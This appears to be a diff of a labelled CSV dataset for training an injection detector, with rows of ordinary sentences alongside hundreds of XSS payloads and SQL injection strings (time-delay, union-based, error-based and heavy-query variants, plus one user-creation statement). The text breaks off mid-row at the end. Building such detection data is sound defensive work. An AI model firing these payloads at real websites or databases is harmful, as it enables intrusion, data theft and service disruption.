onpointerup=alert(1)>XSS</marquee>,1,XSS,6410 -I often select randomly.,0,normal,24646 -"<select oncopy=""alert(1)"" contenteditable>test</select>",1,XSS,8469 -or SELECT pg_sleep(5);,2,SQLi,11401 -1'+ ( select byor where 4538 = 4538,2,SQLi,18375 -"1 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) # utdm",2,SQLi,16830 -1 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) # sipo,2,SQLi,18057 --6109 union all select 6784--,2,SQLi,17658 -Update status.,0,normal,23218 -"<listing onbeforecopy=""alert(1)"" contenteditable>test</listing>",1,XSS,4690 -"-9096"" ) where 9452 = 9452 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --",2,SQLi,20381 -<thead onpointerleave=alert(1)>XSS</thead>,1,XSS,8841 -select sleep ( 5 ) and ( ( 'mmvf' like 'mmvf,2,SQLi,12590 -"1' ) ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( 'ibav' = 'ibav",2,SQLi,21247 -"<td onbeforecut=""alert(1)"" contenteditable>test</td>",1,XSS,5353 -"<caption onmouseleave=""alert(1)"">test</caption>",1,XSS,6926 -"{""id"":null,""name"":""finest""}",0,normal,25983 -<label onpointerdown=alert(1)>XSS</label>,1,XSS,3657 -"1'+ ( select 'rpbx' where 6748 = 6748 and elt ( 4249 = 4249,7259 ) ) +'",2,SQLi,18100 -"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i",2,SQLi,11168 -"<header onmousemove=""alert(1)"">test</header>",1,XSS,2657 -"-4830"" ) ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( ""dyut"" = ""dyut",2,SQLi,19224 -select sleep ( 5 ) and ( ( ( 8354 = 8354,2,SQLi,18597 -"1' ) where 9842 = 9842 union all select null,null,null,null,null,null,null,null#",2,SQLi,12213 -"1' ) where 3262 = 3262 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,12681 -"1%"" and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ""%"" = """,2,SQLi,13652 -"-6629%"" ) ) ) or 8571 = 8571--",2,SQLi,19084 -"1'|| ( select 'fzcu' where 9252 = 9252 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) ) ||'",2,SQLi,19080 -<slot onpointerover=alert(1)>XSS</slot>,1,XSS,6649 -except,0,normal,23369 -"1"" where 4450 = 4450 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,22320 -"1' ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 'swjk' = 'swjk",2,SQLi,14536 -select * from users where id = 1 or \<\. or 1 = 1 -- 1,2,SQLi,11696 -"1"" ) ) ) union all select null#",2,SQLi,19619 -1' ) ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 'ugoz' = 'ugoz,2,SQLi,15920 -"1"" ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( ( ""felm"" = ""felm",2,SQLi,18170 +<figure onpointermove=alert(1)>XSS</figure>,1,XSS,3796 +1 rlike sleep ( 5 ) #,2,SQLi,14615 +-6179 ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( 7732 = 7732,2,SQLi,17536 +select sleep ( 5 ) and ( ( 'srfc' like 'srfc,2,SQLi,13554 +"<div draggable=""true"" contenteditable>drag me</div><var ondrop=alert(1) contenteditable>drop here</var>",1,XSS,4448 +"1 ) ) as mgvw where 4923 = 4923 union all select null,null,null,null--",2,SQLi,15772 +"<style>:target {color: red;}</style><s id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></s>",1,XSS,6389 +"1' where 9420 = 9420 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,16138 +"1' ) ) ) union all select null,null,null,null,null,null--",2,SQLi,18803 +"1"" ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ""eeye"" = ""eeye",2,SQLi,19430 +1' ) ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( 'ajka' = 'ajka,2,SQLi,19616 +"<animation xlink:href=""javascript:alert(88)""/>",1,XSS,9021 +Delete spam.,0,normal,23016 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#",2,SQLi,10701 +ý or 1 = 1 --,2,SQLi,11545 +"<listing draggable=""true"" ondragenter=""alert(1)"">test</listing>",1,XSS,3961 +"1' ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( 'ajkb' = 'ajkb",2,SQLi,13119 +"1"" ) ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( ""adwg"" like ""adwg",2,SQLi,12918 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,10558 +<iframe id=x onfocusin=alert(1)>,1,XSS,4140 +"<small onmouseleave=""alert(1)"">test</small>",1,XSS,5755 +"-4972' ) ) as kfzc where 8817 = 8817 union all select 8817,8817,8817,8817,8817,8817--",2,SQLi,15978 +"1 ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( 4048 = 4048",2,SQLi,16637 +1' ) as xbsc where 6772 = 6772,2,SQLi,19846 +1'|| ( select 'feki' where 4082 = 4082 and ( 3587 = 4207 ) *4207 ) ||',2,SQLi,13757 +"1"" ) as ubva where 6369 = 6369 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,17843 +"1' ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( 'sucj' = 'sucj",2,SQLi,14429 +"1"" ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( ""lmjg"" like ""lmjg",2,SQLi,16865 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--",2,SQLi,10463 +"1"" where 7290 = 7290 union all select null,null,null,null,null,null,null--",2,SQLi,19295 +"<shadow draggable=""true"" ondragleave=""alert(1)"">test</shadow>",1,XSS,2248 +ORDER BY 23#,2,SQLi,10190 +"select * from users where id = 1 or ( \. ) = 1 union select 1,@@VERSION -- 1",2,SQLi,11481 +<th onpointerleave=alert(1)>XSS</th>,1,XSS,2773 +-3026 ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ),2,SQLi,13560 +<strike onpointermove=alert(1)>XSS</strike>,1,XSS,6467 +select pg_sleep ( 5 ),2,SQLi,20275 +"><script+src=https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)""></script>",1,XSS,9759 +1'+ ( select 'qylf' where 6984 = 6984 and 2255 = 5094,2,SQLi,13207 +"-3707"" ) ) ) or 8571 = 8571--",2,SQLi,12135 +"iif ( 5257 = 5257,1,1/0 )",2,SQLi,19821 +"1%' ) ) ) and make_set ( 1543 = 5817,5817 ) and ( ( ( '%' = '",2,SQLi,13986 +"-8929' union all select 5324,5324,5324,5324,5324,5324--",2,SQLi,19222 +"1"" ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( ""ozvp"" = ""ozvp",2,SQLi,12466 +"1' ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ( 'cjre' = 'cjre",2,SQLi,12569 +"1 ) as rnfb where 2405 = 2405 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,18658 +"1"" ) as aifd where 5962 = 5962",2,SQLi,22141 +<applet id=x tabindex=1 onbeforedeactivate=alert(1)></applet><input autofocus>,1,XSS,6254 +Insert the USB drive into the computer.,0,normal,22905 +1' ) as mqxb where 6496 = 6496 and 7533 = 7533--,2,SQLi,13579 +"1%"" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ""%"" = """,2,SQLi,17129 +1' ) where 5871 = 5871,2,SQLi,13374 +trim,0,normal,23158 +"1 ) ) union all select null,null,null,null,null#",2,SQLi,21907 +"1"" ) as pydh where 3407 = 3407 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,14719 +ORDER BY 18,2,SQLi,10216 +"<style>@keyframes slidein {}</style><hr style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></hr>",1,XSS,4462 +"<colgroup oncut=""alert(1)"" contenteditable>test</colgroup>",1,XSS,5618 +""",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10804 +"1' ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( 'ngxz' = 'ngxz",2,SQLi,20058 +"<bgsound draggable=""true"" ondragstart=""alert(1)"">test</bgsound>",1,XSS,6221 +She'll select her shoes.,0,normal,24308 +"He evinced, as premier of the Cape Colony, the same inability to understand the Uitlanders' grievances, the same futile belief in the eventual fairness of President Kruger, as he had shown when giving evidence before the British South Africa Select Committee into the causes of the Jameson Raid.",0,normal,26079 +"1"" ) ) as femc where 1313 = 1313 and 4595 = 4595#",2,SQLi,15281 +1'+ ( select 'hhnz' where 2465 = 2465,2,SQLi,19849 +<dir id=x tabindex=1 onbeforedeactivate=alert(1)></dir><input autofocus>,1,XSS,7842 +""",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10773 +"-8812"" ) where 1646 = 1646 union all select 1646,1646,1646,1646,1646,1646--",2,SQLi,16042 +create user name identified by 'pass123',2,SQLi,11049 +<ul onfocusout=alert(1) tabindex=1 id=x></ul><input autofocus>,1,XSS,6632 +"<menu onpaste=""alert(1)"" contenteditable>test</menu>",1,XSS,4340 +"1"" ) where 9499 = 9499",2,SQLi,14421 +-8264%' ) order by 1#,2,SQLi,17057 +"=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- ++if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23",2,SQLi,22514 +"<content onmousemove=""alert(1)"">test</content>",1,XSS,2102 +1 ) ) as dgso where 4654 = 4654 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,16721 +"<style>:target {color: red;}</style><li id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></li>",1,XSS,2579 +Weekends: Streaming for select public libraries and universities through Kanopy.,0,normal,25135 +"1' ) ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ( 'dbsm' = 'dbsm",2,SQLi,21743 +"1 ) ) ) union all select null,null,null,null,null,null,null#",2,SQLi,13725 +"<style>:target {transform: rotate(180deg);}</style><element id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></element>",1,XSS,3161 +1 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) -- jdia,2,SQLi,16163 +Select the best wedding videographer.,0,normal,24349 +"<style>:target {transform: rotate(180deg);}</style><meter id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></meter>",1,XSS,5305 +<param onpointerenter=alert(1)>XSS</param>,1,XSS,7701 +"<b onclick=""alert(1)"">test</b>",1,XSS,8351 +When you reach the checkout you'll be asked to select which you prefer.,0,normal,25114 +<center onpointerover=alert(1)>XSS</center>,1,XSS,7733 +"-1593' or elt ( 7044 = 6125,6125 ) and 'zkuz' = 'zkuz",2,SQLi,21828 +"-9569%' ) ) union all select 8405,8405,8405,8405--",2,SQLi,21513 +"-6942' ) union all select 7280,7280,7280#",2,SQLi,16520 +"<rp onmouseenter=""alert(1)"">test</rp>",1,XSS,2732 +"<% foo><x foo=""%><script>alert(123)</script>"">",1,XSS,922 +Where's the post office?,0,normal,23468 +"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ""seci"" = ""seci",2,SQLi,17835 +declare @q nvarchar ( 200 ) select @q = 0x770061 ...,2,SQLi,11399 +"1' or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and 'ozur' = 'ozur",2,SQLi,22263 +1' ) ) as qaki where 5272 = 5272,2,SQLi,15058 +"1%"" ) ) ) or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12782 +"<u onpaste=""alert(1)"" contenteditable>test</u>",1,XSS,4220 +"Select the Twitch app and press ""A"" on your controller.3.",0,normal,25539 +"<a href=""jav&#97ascript:javascript:alert(1)"">test1</a>",1,XSS,749 +"<frameset oncontextmenu=""alert(1)"">test</frameset>",1,XSS,7139 +"-8981%"" ) ) ) union all select 4538,4538,4538,4538,4538,4538,4538#",2,SQLi,20413 +"1' ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( 'wcmt' = 'wcmt",2,SQLi,21119 +"<rtc draggable=""true"" ondragenter=""alert(1)"">test</rtc>",1,XSS,5219 +"-9227 ) where 6723 = 6723 union all select 6723,6723,6723,6723,6723,6723,6723,6723,6723,6723--",2,SQLi,17648 +"<style></style\x0D<img src=""about:blank"" onerror=javascript:alert(1)//></style>",1,XSS,426 +"<samp draggable=""true"" ondrag=""alert(1)"">test</samp>",1,XSS,7809 +"-4728"" ) ) as ndri where 3278 = 3278 or make_set ( 9354 = 9354,7185 ) --",2,SQLi,17226 +"1%' ) ) union all select null,null,null#",2,SQLi,16554 +"<blockquote oncontextmenu=""alert(1)"">test</blockquote>",1,XSS,6495 +"hi or 1 = 1 --""",2,SQLi,11538 +"1 ) ) as atiy where 3855 = 3855 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,16361 +"<source draggable=""true"" ondrag=""alert(1)"">test</source>",1,XSS,3065 +"<input onpaste=alert(1) value="""" autofocus>",1,XSS,4259 +Select the right words for the message.,0,normal,24051 +-3578' ) ) ) order by 1--,2,SQLi,15302 +Modify the color scheme.,0,normal,22588 +Where did you find that unique sculpture?,0,normal,23831 +1' ) waitfor delay '0:0:5' and ( 'fpnh' = 'fpnh,2,SQLi,17609 +"-1513"" ) as swvd where 2958 = 2958 union all select 2958,2958,2958--",2,SQLi,15273 +"-2448%"" ) or 3038 = 3038",2,SQLi,13506 +"<IMG SRC=x oncuechange=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1175 +1' ) ) as txxn where 7884 = 7884 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,20944 +-2361' ) ) as mzhv where 2905 = 2905 or 9026 = 5388--,2,SQLi,17563 +<sup onpointerover=alert(1)>XSS</sup>,1,XSS,4732 +"&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\""XSS\"");&lt;/SCRIPT&gt;",1,XSS,929 +"-7258 or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,19781 +"1%' ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( '%' = '",2,SQLi,16859 +Order a vegetarian dish.,0,normal,22605 +"<content ondblclick=""alert(1)"">test</content>",1,XSS,7091 +select sleep ( 5 ) and 'mlmu' = 'mlmu,2,SQLi,21619 +"1"" ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ""qycx"" like ""qycx",2,SQLi,19828 +"-1000"" or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ""isbq"" = ""isbq",2,SQLi,22083 +Let's decide where to have our lunch.,0,normal,23730 +"<style>:target {transform: rotate(180deg);}</style><select id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></select>",1,XSS,7810 +"-1076 union all select 3959,3959--",2,SQLi,13694 +1' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'rjjo' = 'rjjo,2,SQLi,22299 +"1"" and elt ( 1210 = 1210,sleep ( 5 ) )",2,SQLi,16214 +") union select * from information_schema.tables,",2,SQLi,11609 +"1'|| ( select 'hwyv' from dual where 1155 = 1155 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) ) ||'",2,SQLi,19435 +"select * from users where id = 1 or ""1{"" or 1 = 1 -- 1",2,SQLi,11877 +"With the video open, select ""Edit"" from the top menu. 4.",0,normal,25077 +Schumer before the Joint Select Committee reconvenes on Thursday morning.,0,normal,25662 +"1"" ) where 2657 = 2657 and 5309 = 7592--",2,SQLi,14397 +"<mark oncopy=""alert(1)"" contenteditable>test</mark>",1,XSS,7302 +"<div draggable=""true"" contenteditable>drag me</div><legend ondrop=alert(1) contenteditable>drop here</legend>",1,XSS,6196 +ORDER BY 9,2,SQLi,10207 +"<article oncontextmenu=""alert(1)"">test</article>",1,XSS,3083 +"-3884"" where 8012 = 8012 union all select 8012,8012#",2,SQLi,13552 +Select a movie for a movie marathon.,0,normal,24069 +"-4825%' ) union all select 6804,6804,6804,6804,6804,6804,6804--",2,SQLi,16340 +It enables children to select a specific color that reduces perceptual distortion of text.,0,normal,25929 +"<center oncut=""alert(1)"" contenteditable>test</center>",1,XSS,5955 +"1%"" ) ) and ( 7817 = 4371 ) *4371 and ( ( ""%"" = """,2,SQLi,20061 +"1 ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) )",2,SQLi,13055 +"<bdi onmouseenter=""alert(1)"">test</bdi>",1,XSS,5315 +"1 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) -- huss",2,SQLi,16060 +"iif ( 1378 = 6569,1,1/0 )",2,SQLi,16601 +"<style>@keyframes x{}</style><dir style=""animation-name:x"" onanimationend=""alert(1)""></dir>",1,XSS,3887 +"<applet onmouseup=""alert(1)"">test</applet>",1,XSS,6545 +"1' ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( 'sstt' = 'sstt",2,SQLi,16424 +1'+ ( select 'fqkk' where 9725 = 9725,2,SQLi,16072 +"<output onpaste=""alert(1)"" contenteditable>test</output>",1,XSS,8716 +"<datalist onpaste=""alert(1)"" contenteditable>test</datalist>",1,XSS,8283 +Select your dream honeymoon.,0,normal,24321 +"select * from generate_series ( 9863,9863,case when ( 9863 = 3285 ) then 1 else 0 end ) limit 1--",2,SQLi,15345 +-2625' ) ) or 3038 = 3038,2,SQLi,15118 +"<style>@keyframes x{}</style><col style=""animation-name:x"" onanimationstart=""alert(1)""></col>",1,XSS,3288 +"Because The Farewell, starring Awkwafina, opens in select theaters this weekend.",0,normal,26287 +"-6597'+ ( select aewz where 4036 = 4036 union all select 4036,4036,4036,4036,4036,4036,4036--",2,SQLi,12860 +"<frame onpaste=""alert(1)"" contenteditable>test</frame>",1,XSS,3753 +"-2500' ) ) ) union all select 6853,6853,6853,6853--",2,SQLi,21533 +Get select bakeware for up to 20% off this weekend.,0,normal,26100 +1 where 3956 = 3956,2,SQLi,19056 +-8378%' ) union all select 5491#,2,SQLi,21380 +"<img src\x32=x onerror=""javascript:alert(1)"">",1,XSS,623 +"<div draggable=""true"" contenteditable>drag me</div><slot ondrop=alert(1) contenteditable>drop here</slot>",1,XSS,2363 +"<colgroup onmousemove=""alert(1)"">test</colgroup>",1,XSS,3439 +select * from users where id = 1 or $ 1 = 1 or 1 = 1 -- 1,2,SQLi,11834 +"<div draggable=""true"" contenteditable>drag me</div><ins ondragover=alert(1) contenteditable>drop here</ins>",1,XSS,8608 +"&lt;STYLE TYPE=\""text/javascript\""&gt;alert('XSS');&lt;/STYLE&gt;",1,XSS,964 +"<keygen onmousedown=""alert(1)"">test</keygen>",1,XSS,7394 +<tt id=x tabindex=1 onbeforedeactivate=alert(1)></tt><input autofocus>,1,XSS,5046 +"<map draggable=""true"" ondragstart=""alert(1)"">test</map>",1,XSS,3504 +<embed src=%(jscript)s></embed>,1,XSS,742 +"<style>:target {color: red;}</style><abbr id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></abbr>",1,XSS,8846 +Find and select a TV show or movie to play. 3.,0,normal,26152 +"-9509 ) union all select 1193,1193,1193#",2,SQLi,15289 +"<menu ondblclick=""alert(1)"">test</menu>",1,XSS,1902 +"<img SRC=""javascript:document.vulnerable=true;"">",1,XSS,1417 +"1 ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ( 9558 = 9558",2,SQLi,12560 +<multicol id=x tabindex=1 onactivate=alert(1)></multicol>,1,XSS,4703 +"1' ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( 'nuil' like 'nuil",2,SQLi,15438 +Modi nd his parents Govt have no the guts to ban any some of these in Chinese app.. Citizen of India should ever Ban Modi under Govts misconduct!!. Beware Dragons of Shameless Language and Other Selective Deshbhakti!!!,0,normal,26442 +") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337""=""1337",2,SQLi,11122 +"<style>:target {transform: rotate(180deg);}</style><pre id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></pre>",1,XSS,6189 +"<rb draggable=""true"" ondragend=""alert(1)"">test</rb>",1,XSS,6482 +"Dubbed ""?Mixcloud Select,"" the new feature lets listeners subscribe to a Select creator's channel so they can directly support them and contribute to the licensing cost of the music played in the shows.",0,normal,26182 +1 where 4949 = 4949,2,SQLi,16542 +1 ) where 2223 = 2223,2,SQLi,22308 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--",2,SQLi,10390 +"1"" ) ) union all select null#",2,SQLi,20956 +"<p onkeypress=""alert(1)"" contenteditable>test</p>",1,XSS,7732 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--",2,SQLi,10369 +<aside id=x tabindex=1 ondeactivate=alert(1)></aside><input id=y autofocus>,1,XSS,8466 +"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( ""ksip"" like ""ksip",2,SQLi,15661 +Select a nice steady tempo; there is plenty of time for fast playing later.,0,normal,25620 +WAITFOR DELAY '0:0:5',2,SQLi,11234 +"""They belong to a select group who pay for early, firsthand reports on Capitol Hill"" who are, as one lawyer puts it, ""buying information from members of Congress in a perfectly legal way."" This ""select group"" of hedge funds get meetings with lawmakers and their aides through financial firms like JNK Securities who then gather commission on the subsequent deals it brokers.",0,normal,26405 +1%' ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( '%' = ',2,SQLi,16900 +"1 ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,13983 +"-7240' ) ) union all select 8064,8064,8064#",2,SQLi,15134 +"<style>:target {color: red;}</style><slot id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></slot>",1,XSS,4141 +<svg><keygen onload=alert(1)></keygen>,1,XSS,7736 +"UNION ALL SELECT 